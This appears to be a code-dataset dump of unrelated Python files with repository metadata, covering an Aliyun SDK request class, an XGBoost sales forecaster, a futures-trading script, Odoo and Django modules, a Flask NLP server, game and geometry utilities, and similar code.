# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
class DescribeHanaRestoresRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'hbr', '2017-09-08', 'DescribeHanaRestores','hbr')
self.set_protocol_type('https')
def get_VaultId(self):
return self.get_query_params().get('VaultId')
def set_VaultId(self,VaultId):
self.add_query_param('VaultId',VaultId)
def get_DatabaseName(self):
return self.get_query_params().get('DatabaseName')
def set_DatabaseName(self,DatabaseName):
self.add_query_param('DatabaseName',DatabaseName)
def get_BackupId(self):
return self.get_query_params().get('BackupId')
def set_BackupId(self,BackupId):
self.add_query_param('BackupId',BackupId)
def get_PageSize(self):
return self.get_query_params().get('PageSize')
def set_PageSize(self,PageSize):
self.add_query_param('PageSize',PageSize)
def get_RestoreStatus(self):
return self.get_query_params().get('RestoreStatus')
def set_RestoreStatus(self,RestoreStatus):
self.add_query_param('RestoreStatus',RestoreStatus)
def get_RestoreId(self):
return self.get_query_params().get('RestoreId')
def set_RestoreId(self,RestoreId):
self.add_query_param('RestoreId',RestoreId)
def get_ClusterId(self):
return self.get_query_params().get('ClusterId')
def set_ClusterId(self,ClusterId):
self.add_query_param('ClusterId',ClusterId)
def get_PageNumber(self):
return self.get_query_params().get('PageNumber')
def set_PageNumber(self,PageNumber):
self.add_query_param('PageNumber',PageNumber)
def get_Token(self):
return self.get_query_params().get('Token')
def set_Token(self,Token):
self.add_query_param('Token',Token)
|
[
"[email protected]"
] | |
e7b2527e9d44eef72048f1bb2f0a78a12a668f9b
|
77639380e2c33eee09179f372632bcb57d3f7e3f
|
/favorita/base_xgb_model.py
|
d550fd5b81efab514e96961f156451c648bd8a32
|
[] |
no_license
|
razmik/demand_forecast_walmart
|
b8f5c4aaa3cb6dccae102e4ca19f1131131a9f26
|
56292bfbeebc1d3d4962e3ee26d05be2aebd5f4c
|
refs/heads/master
| 2023-01-22T12:30:18.129486 | 2020-08-10T10:44:12 | 2020-08-10T10:44:12 | 283,923,690 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,399 |
py
|
"""
Author: Rashmika Nawaratne
Date: 05-Aug-20 at 4:53 PM
"""
import pandas as pd
import numpy as np
from datetime import datetime
import time
import gc
from xgboost import XGBRegressor
from xgboost import Booster
import matplotlib.pyplot as plt
from favorita.load_data import Data
from favorita.evaluation import Evaluator
MODEL_NAME = 'base_xgb'
OUTPUT_FOLDER = 'model_outputs/' + MODEL_NAME
SELECTED_STORES = [i for i in range(1, 55)]
ONLY_EVALUATE = False
if __name__ == "__main__":
start_time = time.time()
data = Data()
end_time = time.time()
print("Load data in: {} mins.".format((end_time - start_time) / 60))
# Filter stores to reduce the dataset
data.train = data.train.loc[data.train.store_nbr.isin(SELECTED_STORES)]
# Feature Engineering
data.train['month'] = data.train['date'].dt.month
data.train['week'] = data.train['date'].dt.week
data.train['day'] = data.train['date'].dt.dayofweek
data.train['month'] = data.train['month'].astype('int8')
data.train['week'] = data.train['week'].astype('int8')
data.train['day'] = data.train['day'].astype('int8')
# Log transform the target variable (unit_sales)
data.train['unit_sales'] = data.train['unit_sales'].apply(lambda u: np.log1p(float(u)) if float(u) > 0 else 0)
# Merge tables
df_full = pd.merge(data.train, data.items[['item_nbr', 'perishable', 'family']],
on='item_nbr') # Train and items (perishable state)
df_full = pd.merge(df_full,
data.weather_oil_holiday[['date', 'store_nbr', 'is_holiday', 'AvgTemp', 'dcoilwtico_imputed']],
on=['date', 'store_nbr'], how='left') # Merge weather, oil and holiday
del df_full['id']
df_full.rename(columns={'dcoilwtico_imputed': 'oil_price', 'AvgTemp': 'avg_temp'}, inplace=True)
# Get test train split
df_train = df_full[(df_full['date'] > datetime(2017, 1, 1)) & (df_full['date'] < datetime(2017, 7, 12))]
df_valid = df_full[(df_full['date'] >= datetime(2017, 7, 12)) & (df_full['date'] < datetime(2017, 7, 31))]
df_test = df_full[df_full['date'] >= datetime(2017, 7, 31)]
# clean variables
del data
del df_full
gc.collect()
# Modeling
feature_columns = ['store_nbr', 'item_nbr', 'onpromotion', 'month', 'week', 'day', 'perishable', 'is_holiday',
'avg_temp', 'oil_price']
target_column = ['unit_sales']
X_train, Y_train = df_train[feature_columns], df_train[target_column]
X_valid, Y_valid = df_valid[feature_columns], df_valid[target_column]
X_test, Y_test = df_test[feature_columns], df_test[target_column]
print('Training dataset: {}'.format(X_train.shape))
print('Testing dataset: {}'.format(X_test.shape))
if not ONLY_EVALUATE:
# Default XGB
model_xgr_1 = XGBRegressor()
start_time = time.time()
model_xgr_1.fit(X_valid, Y_valid)
end_time = time.time()
print("Model Train time: {} mins.".format((end_time - start_time) / 60))
# Save model
model_xgr_1._Booster.save_model(OUTPUT_FOLDER + '.model')
else:
# Load from file
model_xgr_1 = Booster().load_model(OUTPUT_FOLDER + '.model')
Y_pred = model_xgr_1.predict(X_test)
# Get target variables back from log (antilog)
Y_pred_antilog = np.clip(np.expm1(Y_pred), 0, 1000)
Y_test_antilog = np.expm1(Y_test)
# Evaluation
weights = X_test["perishable"].values * 0.25 + 1
eval = Evaluator()
error_data = []
columns = ['Target unit', 'Data split', 'MSE', 'RMSE', 'NWRMSLE', 'MAE', 'MAPE']
mse_val_lg, rmse_val_lg, nwrmsle_val_lg, mae_val_lg, mape_val_lg = eval.get_error(weights, Y_test, Y_pred, 1)
mse_val, rmse_val, nwrmsle_val, mae_val, mape_val = eval.get_error(weights, Y_test_antilog, Y_pred_antilog, 1)
error_data.append(['Log', 'Test', mse_val_lg, rmse_val_lg, nwrmsle_val_lg, mae_val_lg, mape_val_lg])
error_data.append(['Unit', 'Test', mse_val, rmse_val, nwrmsle_val, mae_val, mape_val])
pd.DataFrame(error_data, columns=columns).to_csv(OUTPUT_FOLDER + '_evaluation.csv', index=False)
# Visualize
# plt.figure()
#
# plt.scatter(Y_test_antilog, Y_pred_antilog, color='blue')
# plt.xlabel("Unit Sales")
# plt.ylabel("Predicted Unit Sales")
# plt.title("Actual vs Predicted Unit Sales")
# plt.show()
|
[
"[email protected]"
] | |
4103376dbbca20b7caa6c000a96c5304895c31f9
|
e017eca53dbe0d35977546df1bb36a59915f6899
|
/debugging/assert_variable.py
|
8aec26cfafa0f80b02465a455cc3c785aa89bd35
|
[] |
no_license
|
clivejan/python_basic
|
7d14b7335f253658f8814acbdb753a735481e377
|
773de644a87792b872e38017dcac34c1691ccc87
|
refs/heads/master
| 2020-12-04T17:44:24.737370 | 2020-01-09T14:43:36 | 2020-01-18T03:11:20 | 231,856,419 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 334 |
py
|
#!/usr/bin/env python3 -O
# Assertion is used for programmer errors and
# should not use try except to handle it.
# Status well
job_title = 'DevOps'
assert job_title == "DevOps", "Tansform from SE to DevOps"
# Status wrong
job_title = 'Systems Engineer'
assert job_title == "DevOps", "Tansform from SE to DevOps"
print(job_title)
|
[
"[email protected]"
] | |
0116db3631d3d531836248a0bca1d5d46ba83d49
|
302442c32bacca6cde69184d3f2d7529361e4f3c
|
/cidtrsend-all/stage3-model/pytz/zoneinfo/Africa/Bujumbura.py
|
76c4c7a6e44ba67e832b34d93a452c2827caf84f
|
[] |
no_license
|
fucknoob/WebSemantic
|
580b85563072b1c9cc1fc8755f4b09dda5a14b03
|
f2b4584a994e00e76caccce167eb04ea61afa3e0
|
refs/heads/master
| 2021-01-19T09:41:59.135927 | 2015-02-07T02:11:23 | 2015-02-07T02:11:23 | 30,441,659 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 391 |
py
|
'''tzinfo timezone information for Africa/Bujumbura.'''
from pytz.tzinfo import StaticTzInfo
from pytz.tzinfo import memorized_timedelta as timedelta
class Bujumbura(StaticTzInfo):
'''Africa/Bujumbura timezone definition. See datetime.tzinfo for details'''
zone = 'Africa/Bujumbura'
_utcoffset = timedelta(seconds=7200)
_tzname = 'CAT'
Bujumbura = Bujumbura()
|
[
"[email protected]"
] | |
ab96c2674dd84ae1432b1ef67ca398aa1e033854
|
71f3ecb8fc4666fcf9a98d39caaffc2bcf1e865c
|
/.history/第2章/2-2/lishi_20200527235931.py
|
947e75d59de12d8489b2a6b14a7c1c09b49fe148
|
[
"MIT"
] |
permissive
|
dltech-xyz/Alg_Py_Xiangjie
|
03a9cac9bdb062ce7a0d5b28803b49b8da69dcf3
|
877c0f8c75bf44ef524f858a582922e9ca39bbde
|
refs/heads/master
| 2022-10-15T02:30:21.696610 | 2020-06-10T02:35:36 | 2020-06-10T02:35:36 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 955 |
py
|
#!/usr/bin/env python
# coding=utf-8
'''
@version:
@Author: steven
@Date: 2020-05-27 22:20:22
@LastEditors: steven
@LastEditTime: 2020-05-27 23:59:31
@Description:将列表的最后几项作为历史记录的过程。
'''
from _collections import deque
def search(lines, pattern, history=5):
previous_lines = deque(maxlen=history)
for line in lines:
if pattern in line:
yield line, previous_lines
previous_lines.append(line)
# Example use on a file
if __name__ == '__main__':
with open('\123.txt') as f:
# with open('123.txt') as f: # FileNotFoundError: [Errno 2] No such file or directory: '123.txt'
for line, prevlines in search(f, 'python', 5):
for pline in prevlines:
print(pline) # print (pline, end='')
print(line) # print (pline, end='')
print('-' * 20)
q = deque(maxlen=3)
q.append(1)
q.append(2)
q.append(3)
print(q)
q.append(4)
print(q)
|
[
"[email protected]"
] | |
82c5ce7b4ebbb0b5752945713ead109a06be2960
|
16ba38ef11b82e93d3b581bbff2c21e099e014c4
|
/haohaninfo/Python_Future_Sample/實單交易/90.py
|
dbf39a68d38224f520449600d95099dfb3431206
|
[] |
no_license
|
penguinwang96825/Auto-Trading
|
cb7a5addfec71f611bdd82534b90e5219d0602dd
|
a031a921dbc036681c5054f2c035f94499b95d2e
|
refs/heads/master
| 2022-12-24T21:25:34.835436 | 2020-09-22T09:59:56 | 2020-09-22T09:59:56 | 292,052,986 | 2 | 5 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,692 |
py
|
# -*- coding: UTF-8 -*-
# 載入相關套件
import sys,indicator,datetime,haohaninfo
# 券商
Broker = 'Masterlink_Future'
# 定義資料類別
Table = 'match'
# 定義商品名稱
Prod = sys.argv[1]
# 取得當天日期
Date = datetime.datetime.now().strftime("%Y%m%d")
# K棒物件
KBar = indicator.KBar(Date,'time',1)
# 定義威廉指標的週期、超買區、超賣區
WILLRPeriod = 14
OverBuy = -20
OverSell = -80
# 預設趨勢為1,假設只有多單進場
Trend=1
# 進場判斷
Index=0
GO = haohaninfo.GOrder.GOQuote()
for i in GO.Describe(Broker, Table, Prod):
time = datetime.datetime.strptime(i[0],'%Y/%m/%d %H:%M:%S.%f')
price=float(i[2])
qty=int(i[3])
tag=KBar.TimeAdd(time,price,qty)
# 更新K棒才判斷,若要逐筆判斷則 註解下面兩行
if tag != 1:
continue
Real = KBar.GetWILLR(WILLRPeriod)
# 當威廉指標已經計算完成,才會去進行判斷
if len(Real) > WILLRPeriod+1:
ThisReal = Real[-1-tag]
LastReal = Real[-2-tag]
# 進入超賣區 並且回檔
if Trend==1 and ThisReal > OverSell and LastReal <= OverSell:
Index=1
OrderTime=time
OrderPrice=price
print(OrderTime,"Order Buy Price:",OrderPrice,"Success!")
GO.EndDescribe()
# 進入超買區 並且回檔
elif Trend==-1 and ThisReal < OverBuy and LastReal >= OverBuy:
Index=-1
OrderTime=time
OrderPrice=price
print(OrderTime,"Order Sell Price:",OrderPrice,"Success!")
GO.EndDescribe()
|
[
"[email protected]"
] | |
5106152e77d060a927253686296d12540bed8155
|
2a94e60460f91c4a4b919953ef1a15de4d89166a
|
/argil_cb_pos_ticket/pos.py
|
79525802be904af3b677e6207922930e7981aaf3
|
[] |
no_license
|
germanponce/addons_cb
|
de8ddee13df36cf2278edbbc495564bbff8ea29e
|
858453d4f4c3e8b43d34a759b20306926f0bf63e
|
refs/heads/master
| 2021-01-22T23:20:16.826694 | 2015-10-29T22:05:03 | 2015-10-29T22:05:03 | 41,502,521 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,265 |
py
|
# -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp import models, fields, api, _
from openerp.tools import float_compare
import openerp.addons.decimal_precision as dp
from datetime import time, datetime
from openerp import SUPERUSER_ID
from openerp import tools
from openerp.osv import osv, fields, expression
from openerp.tools.translate import _
from openerp.exceptions import except_orm, Warning, RedirectWarning
import base64
import amount_to_text_mx as amount_to
# AMOUNT TO TEXT
class pos_order(osv.osv):
_name ='pos.order'
_inherit = 'pos.order'
def _amount_text(self, cr, uid, ids, field_name, args, context=None):
if not context:
context = {}
res = {}
amount_to_text = ''
for record in self.browse(cr, uid, ids, context=context):
if record.amount_total > 0:
amount_to_text = amount_to.get_amount_to_text(
self, record.amount_total, 'es_cheque', record.pricelist_id.currency_id.name
)
res[record.id] = amount_to_text
return res
_columns = {
'amount_to_text': fields.function(_amount_text, method=True, string='Monto en Letra', type='char', size=256, store=True),
}
|
[
"[email protected]"
] | |
0a97d29e2bec4a1a9d370b41f0a000614f2f24db
|
c3e2f56672e01590dc7dc7e184f30c2884ce5d3a
|
/Programs/MyPythonXII/Unit1/PyChap06/filera.py
|
9500b097eee3e35d0a288c02f76d1e850d45b55f
|
[] |
no_license
|
mridulrb/Basic-Python-Examples-for-Beginners
|
ef47e830f3cc21cee203de2a7720c7b34690e3e1
|
86b0c488de4b23b34f7424f25097afe1874222bd
|
refs/heads/main
| 2023-01-04T09:38:35.444130 | 2020-10-18T15:59:29 | 2020-10-18T15:59:29 | 305,129,417 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 364 |
py
|
# File name: ...\\MyPythonXII\Unit1\PyChap06\filera.py
import os
txtfile = "Friends.txt" # Text file is assigned
if os.path.isfile(txtfile):
print ("Friends names are...")
print ("-------------------")
for F in open(txtfile).read(): # Both open and read the contents
print (F, end="")
else:
print ("File does not exist.")
|
[
"[email protected]"
] | |
b8e7b0de85b7573829e61fafb9cd287c1173b9af
|
fbd5c602a612ea9e09cdd35e3a2120eac5a43ccf
|
/Finished/old_py/75.颜色分类.py
|
7bd771f54cb7ff8dcc151c48d2e2b94a7f6bf8e8
|
[] |
no_license
|
czccc/LeetCode
|
0822dffee3b6fd8a6c6e34be2525bbd65ccfa7c0
|
ddeb1c473935480c97f3d7986a602ee2cb3acaa8
|
refs/heads/master
| 2023-09-01T18:18:45.973563 | 2023-08-27T02:44:00 | 2023-08-27T02:44:00 | 206,226,364 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,119 |
py
|
#
# @lc app=leetcode.cn id=75 lang=python
#
# [75] 颜色分类
#
# @lc code=start
class Solution(object):
def sortColors(self, nums):
"""
:type nums: List[int]
:rtype: None Do not return anything, modify nums in-place instead.
"""
left, right = -1, len(nums)
p = 0
while p < right:
if nums[p] == 2:
right -= 1
nums[p] = nums[right]
nums[right] = 2
elif nums[p] == 1:
p += 1
else:
left += 1
nums[p] = 1
nums[left] = 0
p += 1
return
# @lc code=end
# TEST ONLY
import unittest
import sys
sys.path.append("..")
from Base.PyVar import *
class SolutionTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls._func = Solution().sortColors
def test_1(self):
args = [[2, 0, 2, 1, 1, 0]]
ans = [0, 0, 1, 1, 2, 2]
cur_ans = self._func(*args)
self.assertEqual(args[0], ans)
if __name__ == "__main__":
unittest.main(verbosity=2)
|
[
"[email protected]"
] | |
5c9dac8602f051955f5bba3b5b992bee8b05f77a
|
88900156c1fc6d496e87a0c403811e30a7398cfc
|
/check4fsm/Communication.py
|
70dd87ad40c4646164be3443114f9caeac43fce8
|
[] |
no_license
|
Totoro2205/check4fsm
|
4be7b73b9331ed2d46ce119b762d67a64a4420cc
|
4245b7f0babca6f5d15d1f85ee85fddc69cf0196
|
refs/heads/main
| 2023-08-10T07:32:22.121413 | 2021-09-20T09:28:57 | 2021-09-20T09:28:57 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,207 |
py
|
#!/usr/bin/env python
from check4fsm.ProccesText import ProcessText
from check4fsm.TonalizeText import TonalText
from check4fsm.ProcessAppeal import ProcessAppeal
from check4fsm.extractAllData import ExtractData
from check4fsm import *
from natasha import Segmenter, Doc
from loguru import logger
from flask_cors import CORS
import flask
import time
import nltk
import os
logger.add(f"{os.getcwd()}/.logger.log", format="{time} {level} {message}", rotation="50 MB")
ed = ExtractData(os.getcwd() + "/../data/cities.json", os.getcwd() + "/../data/NER.json")
app = flask.Flask(__name__)
class CommunicationFlask:
CORS(app)
def __init__(self, cities: str = os.getcwd() + "/../data/cities.json",
ner: str = os.getcwd() + "/../data/NER.json"):
global ed
ed = ExtractData(cities, ner)
@staticmethod
@logger.catch
@app.route('/', methods=["GET"])
def main_route():
data = flask.request.json
global ed
if data is None:
logger.error(f" failed data is None")
return {}
output_data = dict()
try:
output_data = ed(data["text"])
except Exception as ex:
logger.error(f" failed on the server {ex}")
return {}
return output_data
@staticmethod
@logger.catch
@app.route('/', methods=["POST"])
def hooks():
data = flask.request.json
global ed
if data is None:
logger.error(f" failed data is None")
return {}
output_data = dict()
try:
output_data = ed(data["text"])
except Exception as ex:
logger.error(f" failed on the server {ex}")
return {}
return output_data
@logger.catch
def run_flask(self):
global app
app.run(host="0.0.0.0", port=9000)
def run(cities: str = os.getcwd() + "/data/cities.json", ner: str = os.getcwd() + "/data/NER.json"):
logger.info("Loading all systems")
p = CommunicationFlask(cities, ner)
logger.info("Loaded all systems")
p.run_flask()
if __name__ == '__main__':
run( os.getcwd() + "/data/cities.json", os.getcwd() + "/data/NER.json")
|
[
"[email protected]"
] | |
62cfb6b503b6ce9ea99f372bcf8a13687c42dca9
|
b3b68efa404a7034f0d5a1c10b281ef721f8321a
|
/Scripts/simulation/conditional_layers/conditional_layer_handlers.py
|
9f92448745a071c4aac20c994e6eed081d12f54c
|
[
"Apache-2.0"
] |
permissive
|
velocist/TS4CheatsInfo
|
62195f3333076c148b2a59f926c9fb5202f1c6fb
|
b59ea7e5f4bd01d3b3bd7603843d525a9c179867
|
refs/heads/main
| 2023-03-08T01:57:39.879485 | 2021-02-13T21:27:38 | 2021-02-13T21:27:38 | 337,543,310 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,967 |
py
|
# uncompyle6 version 3.7.4
# Python bytecode 3.7 (3394)
# Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)]
# Embedded file name: T:\InGame\Gameplay\Scripts\Server\conditional_layers\conditional_layer_handlers.py
# Compiled at: 2018-05-11 22:46:41
# Size of source mod 2**32: 5273 bytes
from gsi_handlers.gameplay_archiver import GameplayArchiver
from sims4.gsi.dispatcher import GsiHandler
from sims4.gsi.schema import GsiGridSchema, GsiFieldVisualizers
import date_and_time, enum, services
conditional_layer_service_schema = GsiGridSchema(label='Conditional Layers/Conditional Layer Service')
conditional_layer_service_schema.add_field('conditional_layer', label='Class Name', width=1, unique_field=True)
conditional_layer_service_schema.add_field('layer_hash', label='Layer Name', width=1)
conditional_layer_service_schema.add_field('objects_created', label='Objects Created', width=1)
conditional_layer_service_schema.add_field('requests_waiting', label='Requests Waiting', width=1)
conditional_layer_service_schema.add_field('last_request', label='Last Request', width=1)
with conditional_layer_service_schema.add_has_many('Objects', GsiGridSchema) as (sub_schema):
sub_schema.add_field('object_id', label='Object Id')
sub_schema.add_field('object', label='Object')
with conditional_layer_service_schema.add_has_many('Requests', GsiGridSchema) as (sub_schema):
sub_schema.add_field('request', label='Request')
sub_schema.add_field('speed', label='Speed')
sub_schema.add_field('timer_interval', label='Timer Interval')
sub_schema.add_field('timer_object_count', label='Timer Object Count')
@GsiHandler('conditional_layer_service', conditional_layer_service_schema)
def generate_conditional_layer_service_data(zone_id: int=None):
layer_data = []
conditional_layer_service = services.conditional_layer_service()
if conditional_layer_service is None:
return layer_data
object_manager = services.object_manager()
for conditional_layer, layer_info in conditional_layer_service._layer_infos.items():
object_data = []
for object_id in layer_info.objects_loaded:
obj = object_manager.get(object_id)
object_data.append({'object_id':str(object_id),
'object':str(obj)})
request_data = []
for request in conditional_layer_service.requests:
if request.conditional_layer is conditional_layer:
request_data.append({'request':str(request),
'speed':request.speed.name,
'timer_interval':str(request.timer_interval),
'timer_object_count':str(request.timer_object_count)})
layer_data.append({'layer_hash':str(conditional_layer.layer_name),
'conditional_layer':str(conditional_layer),
'objects_created':str(len(layer_info.objects_loaded)),
'requests_waiting':str(len(request_data)),
'last_request':str(layer_info.last_request_type),
'Objects':object_data,
'Requests':request_data})
return layer_data
class LayerRequestAction(enum.Int, export=False):
SUBMITTED = ...
EXECUTING = ...
COMPLETED = ...
conditional_layer_request_archive_schema = GsiGridSchema(label='Conditional Layers/Conditional Layer Request Archive', sim_specific=False)
conditional_layer_request_archive_schema.add_field('game_time', label='Game/Sim Time', type=(GsiFieldVisualizers.TIME))
conditional_layer_request_archive_schema.add_field('request', label='Request')
conditional_layer_request_archive_schema.add_field('action', label='Action')
conditional_layer_request_archive_schema.add_field('layer_hash', label='Layer Hash')
conditional_layer_request_archive_schema.add_field('speed', label='Speed')
conditional_layer_request_archive_schema.add_field('timer_interval', label='Timer Interval')
conditional_layer_request_archive_schema.add_field('timer_object_count', label='Timer Object Count')
conditional_layer_request_archive_schema.add_field('objects_in_layer_count', label='Object Count')
archiver = GameplayArchiver('conditional_layer_requests', conditional_layer_request_archive_schema,
add_to_archive_enable_functions=True)
def is_archive_enabled():
return archiver.enabled
def archive_layer_request_culling(request, action, objects_in_layer_count=None):
time_service = services.time_service()
if time_service.sim_timeline is None:
time = 'zone not running'
else:
time = time_service.sim_now
entry = {'game_type':str(time), 'request':str(request),
'action':action.name,
'layer_hash':str(hex(request.conditional_layer.layer_name)),
'speed':request.speed.name,
'timer_interval':str(request.timer_interval),
'timer_object_count':str(request.timer_object_count),
'objects_in_layer_count':str(objects_in_layer_count) if objects_in_layer_count else ''}
archiver.archive(entry)
|
[
"[email protected]"
] | |
78de7289058ba6cd0376717e3c054543a4765a6e
|
dda618067f13657f1afd04c94200711c1920ea5f
|
/scoop/user/util/inlines.py
|
fae84630c7d38141cbccae33232c7d71bd188d6d
|
[] |
no_license
|
artscoop/scoop
|
831c59fbde94d7d4587f4e004f3581d685083c48
|
8cef6f6e89c1990e2b25f83e54e0c3481d83b6d7
|
refs/heads/master
| 2020-06-17T20:09:13.722360 | 2017-07-12T01:25:20 | 2017-07-12T01:25:20 | 74,974,701 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 952 |
py
|
# coding: utf-8
from django_inlines import inlines
from django_inlines.inlines import TemplateInline
from scoop.user.models import User
class UserInline(TemplateInline):
"""
Inline d'insertion d'utilisateur
Format : {{user id [style=link|etc.]}}
Exemple : {{user 2490 style="link"}}
"""
inline_args = [{'name': 'style'}]
def get_context(self):
""" Renvoyer le contexte d'affichage du template """
identifier = self.value
style = self.kwargs.get('style', 'link')
# Vérifier que l'utilisateur demandé existe
user = User.objects.get_or_none(id=identifier)
return {'user': user, 'style': style}
def get_template_name(self):
""" Renvoyer le chemin du template """
base = super(UserInline, self).get_template_name()[0]
path = "user/%s" % base
return path
# Enregistrer les classes d'inlines
inlines.registry.register('user', UserInline)
|
[
"[email protected]"
] | |
3f56e0b32438cf0782e92e5ea2de9f3379161e3d
|
679cbcaa1a48c7ec9a4f38fa42d2dc06d7e7b6ef
|
/main.py
|
d5f2cef309384ff826e8e3934d2f1a1e69578595
|
[] |
no_license
|
roblivesinottawa/canada_provinces_game
|
cb2242845e3dd3a3902c0f416ac1a4efa485aecf
|
2aa5c7236c2ac7381522b493fddf415ece9c3a87
|
refs/heads/main
| 2023-03-04T08:08:31.409489 | 2021-02-17T21:46:18 | 2021-02-17T21:46:18 | 339,863,158 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,000 |
py
|
import turtle
import pandas
screen = turtle.Screen()
screen.title("Canada Provinces Game")
image = "canada_map.gif"
screen.addshape(image)
turtle.shape(image)
data = pandas.read_csv("canada_provinces.csv")
all_provinces = data.province.to_list()
guessed = []
while len(guessed) < 50:
answer = screen.textinput(title=f"{len(guessed)} / 12 Provinces Correct",
prompt="What's another provinces's name? ").title()
if answer == "Exit":
missing = []
for province in all_provinces:
if province not in guessed:
missing.append(province)
new_data = pandas.DataFrame(missing)
new_data.to_csv("provinces_to_learn.csv")
break
if answer in all_provinces:
guessed.append(guessed)
t = turtle.Turtle()
t.hideturtle()
t.penup()
province_data = data[data.province == answer]
t.goto(float(province_data.x), float(province_data.y))
t.write(answer)
# turtle.mainloop()
|
[
"[email protected]"
] | |
6605d4e27c4cb4a040af60508ae4e17b5382aed8
|
f594560136416be39c32d5ad24dc976aa2cf3674
|
/mmdet/core/bbox/samplers/__init__.py
|
f58505b59dca744e489328a39fdabb02a893fb51
|
[
"BSD-3-Clause",
"Apache-2.0"
] |
permissive
|
ShiqiYu/libfacedetection.train
|
bd9eb472c2599cbcb2f028fe7b51294e76868432
|
dce01651d44d2880bcbf4e296ad5ef383a5a611e
|
refs/heads/master
| 2023-07-14T02:37:02.517740 | 2023-06-12T07:42:00 | 2023-06-12T07:42:00 | 245,094,849 | 732 | 206 |
Apache-2.0
| 2023-06-12T07:42:01 | 2020-03-05T07:19:23 |
Python
|
UTF-8
|
Python
| false | false | 827 |
py
|
# Copyright (c) OpenMMLab. All rights reserved.
from .base_sampler import BaseSampler
from .combined_sampler import CombinedSampler
from .instance_balanced_pos_sampler import InstanceBalancedPosSampler
from .iou_balanced_neg_sampler import IoUBalancedNegSampler
from .mask_pseudo_sampler import MaskPseudoSampler
from .mask_sampling_result import MaskSamplingResult
from .ohem_sampler import OHEMSampler
from .pseudo_sampler import PseudoSampler
from .random_sampler import RandomSampler
from .sampling_result import SamplingResult
from .score_hlr_sampler import ScoreHLRSampler
__all__ = [
'BaseSampler', 'PseudoSampler', 'RandomSampler',
'InstanceBalancedPosSampler', 'IoUBalancedNegSampler', 'CombinedSampler',
'OHEMSampler', 'SamplingResult', 'ScoreHLRSampler', 'MaskPseudoSampler',
'MaskSamplingResult'
]
|
[
"[email protected]"
] | |
78a54771d395abae7a5403a3cdbd6b176f71da9e
|
d4252920cf72df6973c31dad81aacd5d9ad6d4c6
|
/core_example/core_export_with_name.py
|
52b36666b3edfbf02e3adaec01909a7214c30acb
|
[] |
no_license
|
tnakaicode/GeomSurf
|
e1894acf41d09900906c8d993bb39e935e582541
|
4481180607e0854328ec2cca1a33158a4d67339a
|
refs/heads/master
| 2023-04-08T15:23:22.513937 | 2023-03-20T04:56:19 | 2023-03-20T04:56:19 | 217,652,775 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,697 |
py
|
import numpy as np
import sys
import time
import os
from OCC.Display.SimpleGui import init_display
from OCC.Core.gp import gp_Pnt
from OCC.Core.XSControl import XSControl_Writer, XSControl_WorkSession
from OCC.Core.XCAFApp import XCAFApp_Application
from OCC.Core.XCAFDoc import XCAFDoc_DocumentTool_ShapeTool
from OCC.Core.STEPCAFControl import STEPCAFControl_Writer
from OCC.Core.STEPControl import STEPControl_Writer, STEPControl_Reader
from OCC.Core.STEPControl import STEPControl_AsIs
from OCC.Core.Interface import Interface_Static_SetCVal
from OCC.Core.IFSelect import IFSelect_RetDone
from OCC.Core.TDF import TDF_LabelSequence, TDF_Label, TDF_Tool, TDF_Data
from OCC.Core.TDocStd import TDocStd_Document
from OCC.Core.TDataStd import TDataStd_Name, TDataStd_Name_GetID
from OCC.Core.TCollection import TCollection_AsciiString
from OCC.Core.TCollection import TCollection_ExtendedString
from OCC.Core.BRepPrimAPI import BRepPrimAPI_MakeBox
from OCC.Extend.DataExchange import write_step_file, read_step_file
from OCC.Extend.DataExchange import read_step_file_with_names_colors
from OCCUtils.Construct import make_plane, make_vertex, make_circle
# https://www.opencascade.com/doc/occt-7.4.0/refman/html/class_t_collection___extended_string.html
# https://www.opencascade.com/doc/occt-7.4.0/refman/html/class_x_c_a_f_app___application.html
# https://www.opencascade.com/doc/occt-7.4.0/refman/html/class_t_doc_std___document.html
class ExportCAFMethod (object):
def __init__(self, name="name", tol=1.0E-10):
self.name = name
self.writer = STEPCAFControl_Writer()
self.writer.SetNameMode(True)
self.doc = TDocStd_Document(
TCollection_ExtendedString("pythonocc-doc"))
#self.x_app = XCAFApp_Application.GetApplication()
# self.x_app.NewDocument(
# TCollection_ExtendedString("MDTV-CAF"), self.doc)
self.shape_tool = XCAFDoc_DocumentTool_ShapeTool(self.doc.Main())
Interface_Static_SetCVal("write.step.schema", "AP214")
def Add(self, shape, name="name"):
"""
STEPControl_AsIs translates an Open CASCADE shape to its highest possible STEP representation.
STEPControl_ManifoldSolidBrep translates an Open CASCADE shape to a STEP manifold_solid_brep or brep_with_voids entity.
STEPControl_FacetedBrep translates an Open CASCADE shape into a STEP faceted_brep entity.
STEPControl_ShellBasedSurfaceModel translates an Open CASCADE shape into a STEP shell_based_surface_model entity.
STEPControl_GeometricCurveSet translates an Open CASCADE shape into a STEP geometric_curve_set entity.
"""
label = self.shape_tool.AddShape(shape)
